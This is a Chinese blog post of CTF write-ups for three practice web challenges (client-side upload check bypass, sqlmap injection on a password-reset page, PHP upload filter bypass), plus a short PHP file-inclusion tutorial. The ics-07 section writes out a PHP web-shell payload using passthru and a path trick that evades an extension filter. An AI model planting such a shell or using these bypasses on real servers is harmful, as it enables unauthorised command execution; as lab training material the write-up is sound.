web攻防世界4

最新推荐文章于 2022-04-16 18:23:57 发布
最新推荐文章于 2022-04-16 18:23:57 发布
阅读量176 收藏
点赞数
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43741181/article/details/102658345
版权

upload1

在这里插入图片描述
查看源码发现JS判断

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}
}

这里用check()判断上传的后缀,
直接F12
在这里插入图片描述
删除οnchange=“check”。上传。
在这里插入图片描述
在这里插入图片描述

ics-04

题目描述提到:
在这里插入图片描述
尝试注册
尝试admin注册,提示注册成功,但登录后显示:
在这里插入图片描述
再次注册admin发现还是可以注册,相当于密码重置了。
猜测有别的管理员账号,发现一共有三个页面可操作,登录注册找回密码。
sqlmap跑一下,post型。
抓包findpwd.php,截下来开跑,数据库,表名,列名。
在这里插入图片描述
在这里插入图片描述
用c3tlwDmIn23再次注册,这里前面提到了。
登录记得flag
在这里插入图片描述

ics-07

题目打开直接可以查看源码

<?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>


    <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

    <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

看到floatval(KaTeX parse error: Expected 'EOF', got '&' at position 19: …T[id]) !== '1' &̲&substr(_GET[id], -1) === ‘9’,可以使id=1,9
最后也可以看到 $_SESSION[‘admin’] = True

$ filename = “backup/”.KaTeX parse error: Can't use function '\.' in math mode at position 36: …preg_match('/.+\̲.̲ph(p[3457]?|t|t…/i’, $filename)
这里/.可用flag.php/.绕过。

我们真实目录为uploaded/flag.php
构造木马上传,测试两个.php绕过。
其中 … 代表当前目录的父目录 .代表当前目录 。
file=…/123.php/1.php/…&con=<?php passthru($_GET[haha]);?>
111.198.29.45:38479/uploaded/123.php/1.php?haha=cat …/flag.php
查看源码得到flag
在这里插入图片描述

--------------------------------------------

这里用最简单的方法解释下文件包含(PHP)。
用到的包含函数:
include():执行到include时才包含文件,找不到被包含文件时只会产生警告,脚本将继续执行。
require():只要程序一运行就包含文件,找不到被包含的文件时会产生致命错误,并停止脚本。
include_once()和require_once():若文件中代码已被包含则不会再次包含。
先写一个php文件,在include()这个函数接受过来的都会以PHP代码来处理。
在这里插入图片描述
再写个txt文件放在同一目录下。
在这里插入图片描述
在这里插入图片描述
访问1.php,让id=2.txt,成功返回(这里可以写成一句话木马直接即可连接)。
在这里插入图片描述
远程包含需要打开php.ini中allow_url_fopen和allow_url_include.
只需将2.txt换成在外网的链接,
http://127.0.0.1/test1/1.php?id=2.txt
变为
http://127.0.0.1/test1/1.php?id=http://127.0.0.1/test2/2.txt 即可访问成功。

c3g07f
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
白帽子讲Web安全 pdf
11-27
《白帽子讲Web安全》内容简介:在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?《白帽子讲Web安全》将带你走进Web安全的世界,让你了解Web安全的方方面面。黑客不再变得神秘,攻击技术原来我也可以会,小网站主自己也能找到正确的安全道路。大公司是怎么做安全的,为什么要选择这样的方案呢?你能在《白帽子讲Web安全》中找到答案。详细的剖析,让你不仅能“知其然”,更能“知其所以然”。
白帽子讲Web安全高清完整PDF版
07-03
《白帽子讲Web安全》内容简介:在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?《白帽子讲Web安全》将带你走进Web安全的世界,让你了解Web安全的方方面面。黑客不再变得神秘,攻击技术原来我也可以会,小网站主自己也能找到正确的安全道路。大公司是怎么做安全的,为什么要选择这样的方案呢?你能在《白帽子讲Web安全》中找到答案。详细的剖析,让你不仅能“知其然”,更能“知其所以然”。
ics-07—CTF
qq_40646572的博客
04-16 2185
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
攻防世界6分题目wp
goddemon
10-17 347
攻防世界6分题目wp 一.ics-07 ①利用一句话木马思路 题目提示–>存在解析漏洞(即典型) 考虑为构造payload的题目 然后根据提示来到页面处 查看源码 <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php session_start(); if
攻防世界——web高手进阶区题解
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
攻防世界web高手区writeup
a370793934的专栏
11-27 1485
Cat django报错 ctrl+u查看源码,发现input name=url ?url=%79 发现有url转换,转换成w,在输入=%80(ascii码表第%80不存在)报错 Django使用的是gbk编码,超过%F7的编码不在gbk中有意义 当CURLOPT_SAFE_UPLOAD为 true 时,如果在请求前面加上@的话phpcurl组件是会把后面的当作绝对路径请求,来读...
php substr()函数
weixin_30248399的博客
02-20 524
substr()函数 作用:返回字符串的一部分 用法:substr(string,start,length) 摘自 http://www.w3school.com.cn/php/func_string_substr.asp 参数 描述 string 必需。规定要返回其中一部分的字符串。 start 必需。规定在字符串的何...
XCTF攻防世界web.doc
09-19
0x01 view-source 【题目描述】 X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 【目标】 学会查看源代码 【工具】 firefox浏览器 【分析过程】 ...在url中提交后便可访问页面源码,在...
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: ...(还有一个robots.txt, 打开之后也是指向上面两个页面的) ... 查看页面源代码 有提示,就先暂时先不考虑弱口令 ...
攻防世界RE 流浪者 wp
03-15
攻防世界RE 流浪者 wp
xctf-web-ics07
zhejichensha_l7l的博客
02-19 148
文章目录瞎分析过程二、使用步骤1.引入库2.读入数据总结 瞎分析 感觉就是道php代码审计+文件上传题目 (可能有错,请各位哥哥姐姐们指点指点) 过程 代码如下(示例): <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php
攻防世界-web-ics-04-从0到1的解题历程writeup
CTF小白的博客
04-15 3037
题目分析 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 尝试发现该靶机环境的主要功能为登陆、注册、找回密码,题目描述也是很直接,漏洞点就在这。 遇事不决先扫描一下网站有没有漏洞 发现在findpwd.php中存在sql注入漏洞 尝试联合查询 -1' union select 1,2,3,4--  -1' union select 1,2,(SELECT ...
php 操作系统之间的一些黑魔法(绕过文件上传a.php/.)
3569
01-02 7647
http://wonderkun.cc/index.html/?p=6260x00 前言做了一个CTF题目,遇到了一些有趣的东西,所以写了这篇文章记录了一下。 但是我却不明白造成这个问题的原因在哪里,所以不知道给文章起什么标题,就姑且叫这个非常宽泛的名字吧。0x01 CTF题目原型在遇到的题目中,最后一步是getshell,大概可以简化为以下代码: // 测试环境 linux + apache2
攻防世界练习题web
果果的csdn
06-12 1056
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,读到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
攻防世界MISC base64 / 4 writeup
qq_45837896的博客
07-25 371
(我知道这很水…但是…我现在解不出web题) 由题,base64/4显然出题人想让我们用…base16解密 使用在线工具对其进行解密
关于__Federico Milano 的电力系统分析工具箱.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
mlab-upenn 研究小组的心脏模型模拟.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
混合图像创建大师matlab代码.zip
最新发布
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
中序遍历二叉树-java版本
04-26
在Java中,实现二叉树的中序遍历同样可以通过递归来完成。中序遍历的顺序是:首先递归地中序遍历左子树,然后访问根节点,最后递归地中序遍历右子树。 在这段代码中,Node类定义了二叉树的节点,BinaryTree类包含一个指向根节点的指针和inOrder方法,用于递归地进行中序遍历。printInOrder方法调用inOrder方法并打印出遍历的结果。 在Main类中,我们创建了一个示例二叉树,并调用printInOrder方法来输出中序遍历的结果。输出应该是:4 2 5 1 3,这表示中序遍历的顺序是左子树(4),然后是根节点(2),接着是右子树的左子树(5),然后是右子树的根节点(1),最后是右子树的右子树(3)。
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值